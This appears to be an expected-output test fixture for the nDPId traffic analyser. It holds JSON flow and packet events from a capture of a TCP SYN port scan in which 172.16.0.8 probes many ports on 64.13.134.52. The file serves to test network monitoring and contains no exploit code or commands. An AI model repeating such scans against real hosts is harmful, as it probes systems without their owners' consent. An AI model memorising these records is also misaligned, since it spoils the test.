+00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":664,"source":"synscan.pcap","alias":"nDPId-test","flow_id":655,"flow_packet_id":1,"flow_last_seen":1278275059518,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059518,"pkt":"ACYLMQczACWzv5HuCABFAAAsTKAAADUGxtKsEAAIQA2GNIzT\/mndU4MZAAAAAGACCAAyIgAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":665,"source":"synscan.pcap","alias":"nDPId-test","flow_id":656,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059518,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":212,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":665,"source":"synscan.pcap","alias":"nDPId-test","flow_id":656,"flow_packet_id":1,"flow_last_seen":1278275059518,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059518,"pkt":"ACYLMQczACWzv5HuCABFAAAsqL8AADQGa7OsEAAIQA2GNIzTANTdU4MZAAAAAGACBAAzuAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":666,"source":"synscan.pcap","alias":"nDPId-test","flow_id":657,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059521,"flow_last_seen":1278275059521,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059521,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1096,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":666,"source":"synscan.pcap","alias":"nDPId-test","flow_id":657,"flow_packet_id":1,"flow_last_seen":1278275059521,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059521,"pkt":"ACYLMQczACWzv5HuCABFAAAsh6AAAC8GkdKsEAAIQA2GNIzTBEjdU4MZAAAAAGACEAAkRAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":667,"source":"synscan.pcap","alias":"nDPId-test","flow_id":658,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059521,"flow_last_seen":1278275059521,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059521,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7512,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":667,"source":"synscan.pcap","alias":"nDPId-test","flow_id":658,"flow_packet_id":1,"flow_last_seen":1278275059521,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059521,"pkt":"ACYLMQczACWzv5HuCABFAAAsYFoAACoGvhisEAAIQA2GNIzTHVjdU4MZAAAAAGACDAAPNAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":668,"source":"synscan.pcap","alias":"nDPId-test","flow_id":659,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059521,"flow_last_seen":1278275059521,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059521,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5850,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":668,"source":"synscan.pcap","alias":"nDPId-test","flow_id":659,"flow_packet_id":1,"flow_last_seen":1278275059521,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059521,"pkt":"ACYLMQczACWzv5HuCABFAAAsNFoAACYG7hisEAAIQA2GNIzTFtrdU4MZAAAAAGACDAAVsgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":669,"source":"synscan.pcap","alias":"nDPId-test","flow_id":660,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059521,"flow_last_seen":1278275059521,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059521,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2121,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":669,"source":"synscan.pcap","alias":"nDPId-test","flow_id":660,"flow_packet_id":1,"flow_last_seen":1278275059521,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059521,"pkt":"ACYLMQczACWzv5HuCABFAAAshW4AADgGiwSsEAAIQA2GNIzTCEndU4MZAAAAAGACBAAsQwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":670,"source":"synscan.pcap","alias":"nDPId-test","flow_id":661,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059521,"flow_last_seen":1278275059521,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059521,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2196,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":670,"source":"synscan.pcap","alias":"nDPId-test","flow_id":661,"flow_packet_id":1,"flow_last_seen":1278275059521,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059521,"pkt":"ACYLMQczACWzv5HuCABFAAAsT2wAACwGzQasEAAIQA2GNIzTCJTdU4MZAAAAAGACBAAr+AAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":671,"source":"synscan.pcap","alias":"nDPId-test","flow_id":662,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059521,"flow_last_seen":1278275059521,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059521,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3367,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":671,"source":"synscan.pcap","alias":"nDPId-test","flow_id":662,"flow_packet_id":1,"flow_last_seen":1278275059521,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059521,"pkt":"ACYLMQczACWzv5HuCABFAAAsQX8AAC0G2fOsEAAIQA2GNIzTDSfdU4MZAAAAAGACCAAjZQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":672,"source":"synscan.pcap","alias":"nDPId-test","flow_id":663,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059521,"flow_last_seen":1278275059521,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059521,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":672,"source":"synscan.pcap","alias":"nDPId-test","flow_id":663,"flow_packet_id":1,"flow_last_seen":1278275059521,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059521,"pkt":"ACYLMQczACWzv5HuCABFAAAsGTIAADgG90CsEAAIQA2GNIzTIyvdU4MZAAAAAGACBAARYQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":673,"source":"synscan.pcap","alias":"nDPId-test","flow_id":664,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059521,"flow_last_seen":1278275059521,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059521,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1201,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":673,"source":"synscan.pcap","alias":"nDPId-test","flow_id":664,"flow_packet_id":1,"flow_last_seen":1278275059521,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059521,"pkt":"ACYLMQczACWzv5HuCABFAAAsw2sAADAGVQesEAAIQA2GNIzTBLHdU4MZAAAAAGACBAAv2wAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":674,"source":"synscan.pcap","alias":"nDPId-test","flow_id":665,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059521,"flow_last_seen":1278275059521,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059521,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":34572,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":674,"source":"synscan.pcap","alias":"nDPId-test","flow_id":665,"flow_packet_id":1,"flow_last_seen":1278275059521,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059521,"pkt":"ACYLMQczACWzv5HuCABFAAAsKsAAAC0G8LKsEAAIQA2GNIzThwzdU4MZAAAAAGACCACpfwAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":675,"source":"synscan.pcap","alias":"nDPId-test","flow_id":666,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059522,"flow_last_seen":1278275059522,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059522,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":888,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":675,"source":"synscan.pcap","alias":"nDPId-test","flow_id":666,"flow_packet_id":1,"flow_last_seen":1278275059522,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059522,"pkt":"ACYLMQczACWzv5HuCABFAAAstssAADcGWqesEAAIQA2GNIzTA3jdU4MZAAAAAGACEAAlFAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":676,"source":"synscan.pcap","alias":"nDPId-test","flow_id":667,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059522,"flow_last_seen":1278275059522,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059522,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8200,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":676,"source":"synscan.pcap","alias":"nDPId-test","flow_id":667,"flow_packet_id":1,"flow_last_seen":1278275059522,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059522,"pkt":"ACYLMQczACWzv5HuCABFAAAsbZkAACgGstmsEAAIQA2GNIzTIAjdU4MZAAAAAGACBAAUhAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":677,"source":"synscan.pcap","alias":"nDPId-test","flow_id":668,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059522,"flow_last_seen":1278275059522,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059522,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2047,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":677,"source":"synscan.pcap","alias":"nDPId-test","flow_id":668,"flow_packet_id":1,"flow_last_seen":1278275059522,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059522,"pkt":"ACYLMQczACWzv5HuCABFAAAs9XgAADsGF\/qsEAAIQA2GNIzTB\/\/dU4MZAAAAAGACEAAgjQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":678,"source":"synscan.pcap","alias":"nDPId-test","flow_id":669,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059522,"flow_last_seen":1278275059522,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059522,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2998,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":678,"source":"synscan.pcap","alias":"nDPId-test","flow_id":669,"flow_packet_id":1,"flow_last_seen":1278275059522,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059522,"pkt":"ACYLMQczACWzv5HuCABFAAAsbSgAADkGokqsEAAIQA2GNIzTC7bdU4MZAAAAAGACCAAk1gAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":679,"source":"synscan.pcap","alias":"nDPId-test","flow_id":670,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059522,"flow_last_seen":1278275059522,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059522,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32774,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":679,"source":"synscan.pcap","alias":"nDPId-test","flow_id":670,"flow_packet_id":1,"flow_last_seen":1278275059522,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059522,"pkt":"ACYLMQczACWzv5HuCABFAAAsGhwAADYG+FasEAAIQA2GNIzTgAbdU4MZAAAAAGACDACshQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":680,"source":"synscan.pcap","alias":"nDPId-test","flow_id":671,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059522,"flow_last_seen":1278275059522,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059522,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1053,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":680,"source":"synscan.pcap","alias":"nDPId-test","flow_id":671,"flow_packet_id":1,"flow_last_seen":1278275059522,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059522,"pkt":"ACYLMQczACWzv5HuCABFAAAs9osAADAGIeesEAAIQA2GNIzTBB3dU4MZAAAAAGACBAAwbwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":681,"source":"synscan.pcap","alias":"nDPId-test","flow_id":672,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059522,"flow_last_seen":1278275059522,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059522,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7201,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":681,"source":"synscan.pcap","alias":"nDPId-test","flow_id":672,"flow_packet_id":1,"flow_last_seen":1278275059522,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059522,"pkt":"ACYLMQczACWzv5HuCABFAAAs+cAAADsGE7KsEAAIQA2GNIzTHCHdU4MZAAAAAGACEAAMawAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":682,"source":"synscan.pcap","alias":"nDPId-test","flow_id":673,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059522,"flow_last_seen":1278275059522,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059522,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6106,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":682,"source":"synscan.pcap","alias":"nDPId-test","flow_id":673,"flow_packet_id":1,"flow_last_seen":1278275059522,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059522,"pkt":"ACYLMQczACWzv5HuCABFAAAsIVwAADQG8xasEAAIQA2GNIzTF9rdU4MZAAAAAGACBAAcsgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":683,"source":"synscan.pcap","alias":"nDPId-test","flow_id":674,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059565,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9050,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":683,"source":"synscan.pcap","alias":"nDPId-test","flow_id":674,"flow_packet_id":1,"flow_last_seen":1278275059565,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059565,"pkt":"ACYLMQczACWzv5HuCABFAAAszS8AACYGVUOsEAAIQA2GNIzTI1rdU4MZAAAAAGACDAAJMgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":684,"source":"synscan.pcap","alias":"nDPId-test","flow_id":675,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059565,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4343,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":684,"source":"synscan.pcap","alias":"nDPId-test","flow_id":675,"flow_packet_id":1,"flow_last_seen":1278275059565,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059565,"pkt":"ACYLMQczACWzv5HuCABFAAAsE4oAACwGCOmsEAAIQA2GNIzTEPfdU4MZAAAAAGACBAAjlQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":685,"source":"synscan.pcap","alias":"nDPId-test","flow_id":676,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059565,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":685,"source":"synscan.pcap","alias":"nDPId-test","flow_id":676,"flow_packet_id":1,"flow_last_seen":1278275059565,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059565,"pkt":"ACYLMQczACWzv5HuCABFAAAscS4AADIGpUSsEAAIQA2GNIzTH0ndU4MZAAAAAGACDAANQwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":686,"source":"synscan.pcap","alias":"nDPId-test","flow_id":677,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059565,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1309,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":686,"source":"synscan.pcap","alias":"nDPId-test","flow_id":677,"flow_packet_id":1,"flow_last_seen":1278275059565,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059565,"pkt":"ACYLMQczACWzv5HuCABFAAAsB1sAACgGGRisEAAIQA2GNIzTBR3dU4MZAAAAAGACBAAvbwAAAgQFtA=="} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":687,"source":"synscan.pcap","alias":"nDPId-test","flow_id":678,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059565,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":83,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":687,"source":"synscan.pcap","alias":"nDPId-test","flow_id":678,"flow_packet_id":1,"flow_last_seen":1278275059565,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059565,"pkt":"ACYLMQczACWzv5HuCABFAAAsAs8AADoGC6SsEAAIQA2GNIzTAFPdU4MZAAAAAGACDAAsOQAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":688,"source":"synscan.pcap","alias":"nDPId-test","flow_id":679,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059565,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":54328,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":688,"source":"synscan.pcap","alias":"nDPId-test","flow_id":679,"flow_packet_id":1,"flow_last_seen":1278275059565,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059565,"pkt":"ACYLMQczACWzv5HuCABFAAAsNBUAACkG612sEAAIQA2GNIzT1DjdU4MZAAAAAGACCABcUwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":689,"source":"synscan.pcap","alias":"nDPId-test","flow_id":680,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059565,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4449,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 